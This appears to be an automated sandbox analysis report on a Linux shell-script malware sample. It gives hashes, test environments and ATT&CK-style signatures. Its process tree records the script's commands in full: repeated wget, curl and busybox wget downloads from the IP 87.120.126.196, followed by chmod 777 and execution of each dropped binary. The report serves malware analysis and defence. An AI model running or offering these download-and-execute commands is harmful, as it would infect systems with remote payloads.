Analysis
-
max time kernel
9s -
max time network
128s -
platform
ubuntu-18.04_amd64 -
resource
ubuntu1804-amd64-20240729-en -
resource tags
arch:amd64 arch:i386 image:ubuntu1804-amd64-20240729-en kernel:4.15.0-213-generic locale:en-us os:ubuntu-18.04-amd64 system -
submitted
18/10/2024, 02:42
Static task
static1
Behavioral task
behavioral1
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
ubuntu1804-amd64-20240729-en
Behavioral task
behavioral2
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-armhf-20240611-en
Behavioral task
behavioral3
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsbe-20240611-en
Behavioral task
behavioral4
Sample
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
Resource
debian9-mipsel-20240729-en
General
-
Target
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh
-
Size
10KB
-
MD5
91ccaeb90f7a1a486a1a1cc72526a2c5
-
SHA1
f4eae2ed37483fd578a41a4edaa29af24ebe85be
-
SHA256
c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3
-
SHA512
beb4e0fafb2bc99022e6595d1f0d0e57cd49ae6da6196c900d45f9b3405d9b6a256070fdaf21fff922ed583c8021f0625d81a56fe82e4c7c28ecf1a5578e2d21
-
SSDEEP
192:mploN9In4UdM0DP0B51+JJRzBKOKBiyaploN9s4UdM0XOKBiyX51+JJv7:mploN9In4UdM0DP0EzBBploN9s4UdM0+
Malware Config
Signatures
-
File and Directory Permissions Modification 1 TTPs 28 IoCs
Adversaries may modify file or directory permissions to evade defenses.
Executes dropped EXE 28 IoCs
Writes file to tmp directory 28 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh/tmp/c635a60fca231035afee88df1c53c0f1c255519fd61adb46bbc5f816c56f95d3.sh1⤵PID:1510
-
/bin/rm/bin/rm bins.sh2⤵PID:1511
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1512
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Writes file to tmp directory
PID:1514
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1515
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:1519
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:1520
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1521
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1522
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Writes file to tmp directory
PID:1523
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1524
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:1525
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:1526
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1527
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1528
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Writes file to tmp directory
PID:1529
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1530
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:1531
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:1532
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1533
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1534
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Writes file to tmp directory
PID:1535
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1536
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:1537
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:1538
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1539
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1540
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Writes file to tmp directory
PID:1541
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1542
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:1543
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:1544
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1545
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1546
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Writes file to tmp directory
PID:1547
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1548
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:1549
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:1550
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1551
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1552
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Writes file to tmp directory
PID:1553
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1554
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:1555
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:1556
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1557
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1558
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Writes file to tmp directory
PID:1559
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1560
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:1561
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:1562
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1563
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1564
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Writes file to tmp directory
PID:1565
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1566
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:1567
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:1568
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1569
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1570
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Writes file to tmp directory
PID:1571
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1572
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:1573
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1574
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1575
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1576
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Writes file to tmp directory
PID:1577
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1578
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1579
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1580
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1581
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1582
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Writes file to tmp directory
PID:1583
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1584
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1585
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1586
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1587
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1588
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Writes file to tmp directory
PID:1589
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1590
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1591
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1592
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1593
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1594
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Writes file to tmp directory
PID:1595
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1596
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:1597
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:1598
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1599
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1600
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Writes file to tmp directory
PID:1601
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1602
-
-
/bin/chmodchmod 777 EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- File and Directory Permissions Modification
PID:1603
-
-
/tmp/EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL./EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵
- Executes dropped EXE
PID:1604
-
-
/bin/rmrm EoIIk2EceExMCmWqZXWoP8q4gt2mV71pNL2⤵PID:1605
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1606
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Writes file to tmp directory
PID:1607
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1608
-
-
/bin/chmodchmod 777 G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- File and Directory Permissions Modification
PID:1609
-
-
/tmp/G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK./G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵
- Executes dropped EXE
PID:1610
-
-
/bin/rmrm G47bjjySHKnv0gRcENP8u78RZ9M3ttfMtK2⤵PID:1611
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1612
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Writes file to tmp directory
PID:1613
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1614
-
-
/bin/chmodchmod 777 OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- File and Directory Permissions Modification
PID:1615
-
-
/tmp/OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB./OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵
- Executes dropped EXE
PID:1616
-
-
/bin/rmrm OQmV2buMUCEhLcC9Kb4kJISvfkE9uuZykB2⤵PID:1617
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1618
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Writes file to tmp directory
PID:1619
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1620
-
-
/bin/chmodchmod 777 kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- File and Directory Permissions Modification
PID:1621
-
-
/tmp/kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I./kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵
- Executes dropped EXE
PID:1622
-
-
/bin/rmrm kJJbRmaOZ4fFlAGd2cmwaeF2zWnW8Dfz2I2⤵PID:1623
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1624
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Writes file to tmp directory
PID:1625
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1626
-
-
/bin/chmodchmod 777 VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- File and Directory Permissions Modification
PID:1627
-
-
/tmp/VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O./VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵
- Executes dropped EXE
PID:1628
-
-
/bin/rmrm VNrWv4Z1nJ4qc4acxWgz9TwhBvaYiOmt7O2⤵PID:1629
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1630
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Writes file to tmp directory
PID:1631
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1632
-
-
/bin/chmodchmod 777 nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- File and Directory Permissions Modification
PID:1633
-
-
/tmp/nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ./nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵
- Executes dropped EXE
PID:1634
-
-
/bin/rmrm nSZpcsJHlEGBHTjFGKFD0fdNPwS1Eq3SnQ2⤵PID:1635
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1636
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Writes file to tmp directory
PID:1637
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1638
-
-
/bin/chmodchmod 777 UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- File and Directory Permissions Modification
PID:1639
-
-
/tmp/UagXFinxQeTfADtKdzECeTZBZzPdMxja4S./UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵
- Executes dropped EXE
PID:1640
-
-
/bin/rmrm UagXFinxQeTfADtKdzECeTZBZzPdMxja4S2⤵PID:1641
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1642
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Writes file to tmp directory
PID:1643
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1644
-
-
/bin/chmodchmod 777 rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- File and Directory Permissions Modification
PID:1645
-
-
/tmp/rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A./rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵
- Executes dropped EXE
PID:1646
-
-
/bin/rmrm rFHbJcIQgbd53k9t0TEGvSGdoQxCiiDl5A2⤵PID:1647
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1648
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Writes file to tmp directory
PID:1649
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1650
-
-
/bin/chmodchmod 777 cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- File and Directory Permissions Modification
PID:1651
-
-
/tmp/cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv./cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵
- Executes dropped EXE
PID:1652
-
-
/bin/rmrm cXPilQlpKo7tQWTxKynZn5oNavunwfbqlv2⤵PID:1653
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1654
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Writes file to tmp directory
PID:1655
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1656
-
-
/bin/chmodchmod 777 M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- File and Directory Permissions Modification
PID:1657
-
-
/tmp/M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp./M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵
- Executes dropped EXE
PID:1658
-
-
/bin/rmrm M2Zp1qBDZVMyq5XqXOdrkoNqCfh7QXTpEp2⤵PID:1659
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1660
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Writes file to tmp directory
PID:1661
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1662
-
-
/bin/chmodchmod 777 rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- File and Directory Permissions Modification
PID:1663
-
-
/tmp/rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ4./rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵
- Executes dropped EXE
PID:1664
-
-
/bin/rmrm rRfkzZU5dlknkfFFyfhBSBv24snrpSTrZ42⤵PID:1665
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1666
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Writes file to tmp directory
PID:1667
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1668
-
-
/bin/chmodchmod 777 k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- File and Directory Permissions Modification
PID:1669
-
-
/tmp/k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL7./k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵
- Executes dropped EXE
PID:1670
-
-
/bin/rmrm k9NpJqHkMePUrCfp2HSoXIdcDiIOLLiwL72⤵PID:1671
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1672
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Writes file to tmp directory
PID:1673
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1674
-
-
/bin/chmodchmod 777 ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- File and Directory Permissions Modification
PID:1675
-
-
/tmp/ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw./ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵
- Executes dropped EXE
PID:1676
-
-
/bin/rmrm ONkovcOLMi6m31ED2m1WECoIjCuDeG0ZCw2⤵PID:1677
-
-
/usr/bin/wgetwget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1678
-
-
/usr/bin/curlcurl -O http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Writes file to tmp directory
PID:1679
-
-
/bin/busybox/bin/busybox wget http://87.120.126.196/bins/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1680
-
-
/bin/chmodchmod 777 ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- File and Directory Permissions Modification
PID:1681
-
-
/tmp/ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn./ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵
- Executes dropped EXE
PID:1682
-
-
/bin/rmrm ZNIMHUB3n7yiMoOE2WivNyI1bThl2XFohn2⤵PID:1683
-
Network
MITRE ATT&CK Enterprise v15
Downloads
-
Filesize
153B
MD5 998368d7c95ea4293237f2320546e440
SHA1 30dfd2d3bb8a7e3241bd7792e90a98ebb70be3a4
SHA256 533a1ca5d6595793725bca7641d9461a0f00dd1732dded3e4281196f5dd21736
SHA512 648c4720a85dbf834be1ba00f0e1b4167cc670fe15896efb00a77fb6e0c225a13aae3da10d85fa6e7f726420d9bb3c20c43466e02296d44153c127b7160e0b97